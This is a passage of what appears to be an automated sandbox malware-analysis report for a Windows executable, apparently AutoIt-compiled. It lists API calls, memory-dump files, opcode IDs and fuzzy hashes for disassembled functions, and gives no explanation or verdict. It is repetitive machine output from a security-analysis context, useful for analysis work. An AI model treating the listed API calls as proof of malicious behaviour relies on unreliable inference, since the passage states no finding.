                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                      • String ID:
                                                      • API String ID: 4046560759-0
                                                      • Opcode ID: fc2d9f0e26cf2c715fc3c5b22b8d54eaa548fc15be8860b3e2077dd77c7a501d
                                                      • Instruction ID: a22b865f3c826f97bec8364b3b5113030777f519ff92abf34b93af135a03bc73
                                                      • Opcode Fuzzy Hash: fc2d9f0e26cf2c715fc3c5b22b8d54eaa548fc15be8860b3e2077dd77c7a501d
                                                      • Instruction Fuzzy Hash: 70516B31108245AFD704EF64C899EAFBBEAFF84314F04492DF5859B2A2DB71E905CB52
                                                      APIs
                                                      • GetMenu.USER32(?), ref: 006657FB
                                                      • GetMenuItemCount.USER32(00000000), ref: 00665832
                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0066585A
                                                      • GetMenuItemID.USER32(?,?), ref: 006658C9
                                                      • GetSubMenu.USER32(?,?), ref: 006658D7
                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 00665928
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$CountMessagePostString
                                                      • String ID:
                                                      • API String ID: 650687236-0
                                                      • Opcode ID: 858874b4e839abe202d5463b8622636359ad58ee7c3fce0692623faaa7ec27f2
                                                      • Instruction ID: ea93ee447b519b7c2d02dee9badd4ab32d8952e9e4f016cbd6cbfb25bf9ffd37
                                                      • Opcode Fuzzy Hash: 858874b4e839abe202d5463b8622636359ad58ee7c3fce0692623faaa7ec27f2
                                                      • Instruction Fuzzy Hash: 76514F75E00625EFDF15DF64C846AAEBBB6EF48310F104069E852BB351CB74AE418B94
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 0063EF06
                                                      • VariantClear.OLEAUT32(00000013), ref: 0063EF78
                                                      • VariantClear.OLEAUT32(00000000), ref: 0063EFD3
                                                      • _memmove.LIBCMT ref: 0063EFFD
                                                      • VariantClear.OLEAUT32(?), ref: 0063F04A
                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0063F078
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                                      • String ID:
                                                      • API String ID: 1101466143-0
                                                      • Opcode ID: dbddcd379b3316f38b26f88bbeca2d0481353b1b4d8ed9528e37c75976b82d80
                                                      • Instruction ID: 63413fad1dc7bb2ee8d62d4c8bf6c03d898dd08574f3ec4b4d16a68f61c3b787
                                                      • Opcode Fuzzy Hash: dbddcd379b3316f38b26f88bbeca2d0481353b1b4d8ed9528e37c75976b82d80
                                                      • Instruction Fuzzy Hash: C25154B5A00209AFCB14CF58C890AAAB7F9FF48310F15856AE949DB301E735E911CFA0
                                                      APIs
                                                      • _memset.LIBCMT ref: 00642258
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006422A3
                                                      • IsMenu.USER32(00000000), ref: 006422C3
                                                      • CreatePopupMenu.USER32 ref: 006422F7
                                                      • GetMenuItemCount.USER32(000000FF), ref: 00642355
                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00642386
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                      • String ID:
                                                      • API String ID: 3311875123-0
                                                      • Opcode ID: e36fdbdeb869d3032c7ad80825fcece2bc85643e26c9bc71ad82a90f36a92101
                                                      • Instruction ID: deff8eed446bf27d526c77d65b7425b4e1d4fd07657bbab7c62c1d119874f2a3
                                                      • Opcode Fuzzy Hash: e36fdbdeb869d3032c7ad80825fcece2bc85643e26c9bc71ad82a90f36a92101
                                                      • Instruction Fuzzy Hash: A851AE7060020BDBDF22DF68D8A8BEEBBF6BF45314F648129F811A7290D7B49945CB51
                                                      APIs
                                                        • Part of subcall function 005E2612: GetWindowLongW.USER32(?,000000EB), ref: 005E2623
                                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 005E179A
                                                      • GetWindowRect.USER32(?,?), ref: 005E17FE
                                                      • ScreenToClient.USER32(?,?), ref: 005E181B
                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 005E182C
                                                      • EndPaint.USER32(?,?), ref: 005E1876
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                      • String ID:
                                                      • API String ID: 1827037458-0
                                                      • Opcode ID: 0e2585c131021702dbf61cef6b04a2e02652ac7c30b3f00e4d13d8da4760695f
                                                      • Instruction ID: 345afcab288cdae2b37045b3973f75b72641be06a816f607de585116b59bbe68
                                                      • Opcode Fuzzy Hash: 0e2585c131021702dbf61cef6b04a2e02652ac7c30b3f00e4d13d8da4760695f
                                                      • Instruction Fuzzy Hash: 5941CF30104741AFC710EF26DC84FBA7BEAFB4A720F044629F9A58B2A1C770AC45DB61
                                                      APIs
                                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,00654E41,?,?,00000000,00000001), ref: 006570AC
                                                        • Part of subcall function 006539A0: GetWindowRect.USER32(?,?), ref: 006539B3
                                                      • GetDesktopWindow.USER32 ref: 006570D6
                                                      • GetWindowRect.USER32(00000000), ref: 006570DD
                                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0065710F
                                                        • Part of subcall function 00645244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006452BC
                                                      • GetCursorPos.USER32(?), ref: 0065713B
                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00657199
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                      • String ID:
                                                      • API String ID: 4137160315-0
                                                      • Opcode ID: 5252ec3323488e0ce7a410e6b16cd1e6c39878491518c06aff428b88c86bbfdc
                                                      • Instruction ID: 62551b624248436ea5b53ebc79d180715d966f09c1978e3e74c1da501ce5eb62
                                                      • Opcode Fuzzy Hash: 5252ec3323488e0ce7a410e6b16cd1e6c39878491518c06aff428b88c86bbfdc
                                                      • Instruction Fuzzy Hash: 3A31D272509705ABD720DF14EC49B9BB7AAFF89314F040919F98597291CB70EA09CB92
                                                      APIs
                                                        • Part of subcall function 006380A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006380C0
                                                        • Part of subcall function 006380A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006380CA
                                                        • Part of subcall function 006380A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006380D9
                                                        • Part of subcall function 006380A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006380E0
                                                        • Part of subcall function 006380A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006380F6
                                                      • GetLengthSid.ADVAPI32(?,00000000,0063842F), ref: 006388CA
                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 006388D6
                                                      • HeapAlloc.KERNEL32(00000000), ref: 006388DD
                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 006388F6
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,0063842F), ref: 0063890A
                                                      • HeapFree.KERNEL32(00000000), ref: 00638911
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                      • String ID:
                                                      • API String ID: 3008561057-0
                                                      • Opcode ID: 129d9fcaa904390efe793e9d5164aae922a23bf2fb1d2a2cab0067d3e6bdc2af
                                                      • Instruction ID: 33eba48f53acb3a5ecd03937c28341260b3bba65dc0dab2a390c5dce5eff8bab
                                                      • Opcode Fuzzy Hash: 129d9fcaa904390efe793e9d5164aae922a23bf2fb1d2a2cab0067d3e6bdc2af
                                                      • Instruction Fuzzy Hash: 3011AF71501209FFDB109FA8DC09BFEB76AFB45355F104028F88597250CB72A904DBA0
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 006385E2
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 006385E9
                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 006385F8
                                                      • CloseHandle.KERNEL32(00000004), ref: 00638603
                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00638632
                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00638646
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                      • String ID:
                                                      • API String ID: 1413079979-0
                                                      • Opcode ID: e65c6e74b9259394d59f1f3134cf98921af6df92ecde11d5391f66eebdaed7dd
                                                      • Instruction ID: 9180cd6ebc4d005da67f05170bb0a543bba6d478f1acdcdcd200569ba8c50ad1
                                                      • Opcode Fuzzy Hash: e65c6e74b9259394d59f1f3134cf98921af6df92ecde11d5391f66eebdaed7dd
                                                      • Instruction Fuzzy Hash: D6116D7250020DAFDF018FA4ED49FDE7BAAEF48314F045064FE04A2161C7B18D65DBA0
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 0063B7B5
                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0063B7C6
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0063B7CD
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0063B7D5
                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0063B7EC
                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0063B7FE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: CapsDevice$Release
                                                      • String ID:
                                                      • API String ID: 1035833867-0
                                                      • Opcode ID: 86d17b11a23496a477af3ce235369c2a5be4f1faa833a041390aed9e9e54c827
                                                      • Instruction ID: 9665437e7c72366d3bc067b1da5410fbe53296515b2f6d93dfb755e4d1b9a75c
                                                      • Opcode Fuzzy Hash: 86d17b11a23496a477af3ce235369c2a5be4f1faa833a041390aed9e9e54c827
                                                      • Instruction Fuzzy Hash: C60184B5E00209BBEB109BA6DC45A5EBFB9EB48351F004075FA04E7391D6719C10CF90
                                                      APIs
                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00600193
                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 0060019B
                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 006001A6
                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 006001B1
                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 006001B9
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 006001C1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Virtual
                                                      • String ID:
                                                      • API String ID: 4278518827-0
                                                      • Opcode ID: 0b0d99490c7ce82c2e514eb6db2fc30c38e66f73171b9ab06e8ef5dcbc5d4417
                                                      • Instruction ID: ab469080b3293e9461cd8d5df578e56dc5db26a65a8109de4672565b06bb25d0
                                                      • Opcode Fuzzy Hash: 0b0d99490c7ce82c2e514eb6db2fc30c38e66f73171b9ab06e8ef5dcbc5d4417
                                                      • Instruction Fuzzy Hash: 3D016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BE15C87941C7F5A864CBE5
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 006453F9
                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0064540F
                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 0064541E
                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0064542D
                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00645437
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0064543E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 839392675-0
                                                      • Opcode ID: b29690a017e44ac83fde016bd394babb8550273d09ab153fff785db6212c5ef4
                                                      • Instruction ID: b38474af5a22ac782048730788ccf0b571bec971087344371d5da022d2bbf833
                                                      • Opcode Fuzzy Hash: b29690a017e44ac83fde016bd394babb8550273d09ab153fff785db6212c5ef4
                                                      • Instruction Fuzzy Hash: EDF06732240158BBE3205BA2EC0EEEB7A7DEBCBB11F001169FA04D10A19AE01A0186B5
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,?), ref: 00647243
                                                      • EnterCriticalSection.KERNEL32(?,?,005F0EE4,?,?), ref: 00647254
                                                      • TerminateThread.KERNEL32(00000000,000001F6,?,005F0EE4,?,?), ref: 00647261
                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8,?,005F0EE4,?,?), ref: 0064726E
                                                        • Part of subcall function 00646C35: CloseHandle.KERNEL32(00000000,?,0064727B,?,005F0EE4,?,?), ref: 00646C3F
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00647281
                                                      • LeaveCriticalSection.KERNEL32(?,?,005F0EE4,?,?), ref: 00647288
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                      • String ID:
                                                      • API String ID: 3495660284-0
                                                      • Opcode ID: f3fd1b8f7a90ce91eed5de94e5599832f149090cd0828d6693fe56d4e758f5f7
                                                      • Instruction ID: 588765158c5d685ed6ae3361569141ea2ee3cc97a31922ed159bc6bad4fcb0f0
                                                      • Opcode Fuzzy Hash: f3fd1b8f7a90ce91eed5de94e5599832f149090cd0828d6693fe56d4e758f5f7
                                                      • Instruction Fuzzy Hash: 9DF03A36544612ABD7511BA4FD9C9DB772BFF45702B111631F502910A0CBB66A41CE50
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0063899D
                                                      • UnloadUserProfile.USERENV(?,?), ref: 006389A9
                                                      • CloseHandle.KERNEL32(?), ref: 006389B2
                                                      • CloseHandle.KERNEL32(?), ref: 006389BA
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 006389C3
                                                      • HeapFree.KERNEL32(00000000), ref: 006389CA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                      • String ID:
                                                      • API String ID: 146765662-0
                                                      • Opcode ID: 73c1a5371a6d288cd984929919681fd3b776469ef1b4f05bb3bae1c5b447dad3
                                                      • Instruction ID: 662daae840f83f0ce40ca7614098ba1a08c7784e034b28c49252e3e1a747238c
                                                      • Opcode Fuzzy Hash: 73c1a5371a6d288cd984929919681fd3b776469ef1b4f05bb3bae1c5b447dad3
                                                      • Instruction Fuzzy Hash: 84E0C236004001FBDB011FE2FC0C90AFF6AFB8A362B109230F21981170CBB2A420DB90
                                                      APIs
                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00672C7C,?), ref: 006376EA
                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00672C7C,?), ref: 00637702
                                                      • CLSIDFromProgID.OLE32(?,?,00000000,0066FB80,000000FF,?,00000000,00000800,00000000,?,00672C7C,?), ref: 00637727
                                                      • _memcmp.LIBCMT ref: 00637748
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: FromProg$FreeTask_memcmp
                                                      • String ID: ,,g
                                                      • API String ID: 314563124-619837891
                                                      • Opcode ID: 278fabf37666f8aa9b6144bebd19907f270170266a304947418a5de0ed8083c8
                                                      • Instruction ID: 927605c030b66b775c20a8ac75076a298b2f38bab288439e31a6bcedc198b470
                                                      • Opcode Fuzzy Hash: 278fabf37666f8aa9b6144bebd19907f270170266a304947418a5de0ed8083c8
                                                      • Instruction Fuzzy Hash: BE811F75A00109EFCB14DFA4C994DEEB7BAFF89315F104558F505AB250DB71AE06CBA0
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00658613
                                                      • CharUpperBuffW.USER32(?,?), ref: 00658722
                                                      • VariantClear.OLEAUT32(?), ref: 0065889A
                                                        • Part of subcall function 00647562: VariantInit.OLEAUT32(00000000), ref: 006475A2
                                                        • Part of subcall function 00647562: VariantCopy.OLEAUT32(00000000,?), ref: 006475AB
                                                        • Part of subcall function 00647562: VariantClear.OLEAUT32(00000000), ref: 006475B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                      • API String ID: 4237274167-1221869570
                                                      • Opcode ID: db69020d79136090e3d92b34f69eb62f1ad01b1bfa40331cd9d7bd0c213147e9
                                                      • Instruction ID: f9889646301835d3306fa157036473f6fdbab0ccff2dc5332eaa6ee4d46e8708
                                                      • Opcode Fuzzy Hash: db69020d79136090e3d92b34f69eb62f1ad01b1bfa40331cd9d7bd0c213147e9
                                                      • Instruction Fuzzy Hash: 76919C70608342DFCB14DF25C48495ABBE6FF89315F04492DF88A9B362DB30E909CB91
                                                      APIs
                                                        • Part of subcall function 005FFC86: _wcscpy.LIBCMT ref: 005FFCA9
                                                      • _memset.LIBCMT ref: 00642B87
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00642BB6
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00642C69
                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00642C97
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
